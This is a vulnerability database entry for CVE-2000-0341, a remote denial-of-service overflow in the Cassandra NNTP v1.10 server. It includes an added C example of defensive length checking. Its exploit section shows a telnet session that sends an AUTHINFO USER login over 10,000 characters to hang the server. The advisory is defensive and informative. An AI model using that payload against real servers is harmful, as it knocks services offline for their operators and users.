Cassandra NNTPServer v1.10 Remote Buffer Overflow Vulnerability

Vulnerability ID: 1105809
Vulnerability type: Unknown
Published: 2000-05-01
Updated: 2005-05-02
CVE ID: CVE-2000-0341
CNNVD-ID: CNNVD-200005-003
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/19884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-003
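|Vulnerability details
CassandraNNTP is a newsgroup server program. Its implementation contains a buffer overflow vulnerability that a remote attacker may be able to use to cause a denial of service against the server program. The Cassandra NNTP v1.10 server software does not perform a proper length check when handling login information: when a user enters a login name longer than 10000 bytes, the NNTP server stops responding until the administrator restarts the application.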
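The missing check described above, shown from the server side as an added example (not code from Cassandra NNTP or from the advisory): a handler that rejects an overlong line before copying the login name. The function names, the 64-byte name limit and the use of the 512-character command-line limit from RFC 977 as the cutoff are assumptions made for illustration, and the input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NNTP_MAX_LINE 512 /* RFC 977 command-line limit, CRLF included */
#define MAX_USER 64       /* assumed local policy, not from the advisory */
enum auth_rc { AUTH_OK, AUTH_LINE_TOO_LONG, AUTH_NOT_USER_CMD, AUTH_NAME_TOO_LONG };

/* Hypothetical handler: validate one received line of len bytes and copy
 * the login name into user (capacity cap) only when it is known to fit. */
enum auth_rc parse_authinfo_user(const char *line, size_t len, char *user, size_t cap)
{
    static const char prefix[] = "AUTHINFO USER ";
    const size_t plen = sizeof(prefix) - 1;
    if (len > NNTP_MAX_LINE) return AUTH_LINE_TOO_LONG; /* before any copy */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--; /* drop the trailing CRLF */
    if (len <= plen) return AUTH_NOT_USER_CMD;
    for (size_t i = 0; i < plen; i++) /* keywords are case-insensitive */
        if (toupper((unsigned char)line[i]) != prefix[i])
            return AUTH_NOT_USER_CMD;
    size_t nlen = len - plen;
    if (nlen > MAX_USER || nlen >= cap) return AUTH_NAME_TOO_LONG; /* room for NUL */
    memcpy(user, line + plen, nlen);
    user[nlen] = '\0';
    return AUTH_OK;
}

/* Constructed input: "AUTHINFO USER " + n 'A' bytes + CRLF. */
enum auth_rc try_name_len(size_t n)
{
    char user[MAX_USER + 1];
    size_t len = 14 + n + 2;
    char *line = malloc(len);
    if (!line) abort();
    memcpy(line, "AUTHINFO USER ", 14);
    memset(line + 14, 'A', n);
    memcpy(line + 14 + n, "\r\n", 2);
    enum auth_rc rc = parse_authinfo_user(line, len, user, sizeof user);
    free(line);
    return rc;
}

int main(void)
{
    printf("8 -> %d, 100 -> %d, 10000 -> %d\n", try_name_len(8), try_name_len(100), try_name_len(10000));
    return 0;
}
```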
|Vulnerability exploit (EXP)
source: http://www.securityfocus.com/bid/1156/info

An unchecked buffer exists in the code that handles login information in the Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1 May 2000 xx:xx:xx +-300 (posting allowed)

AUTHINFO USER <10 000 character string>


Where buffer is 10000 characters.
|References

Source: BID
Name: 1156
Link: http://www.securityfocus.com/bid/1156
Source: NTBUGTRAQ
Name: 20000501 Remote DoS attack in CASSANDRA NNTP Server v1.10 from ATRIUM
Link: http://marc.theaimsgroup.com/?l=ntbugtraq&m=95736106504870&w=2
Source: NSFOCUS
Name: 486
Link: http://www.nsfocus.net/vulndb/486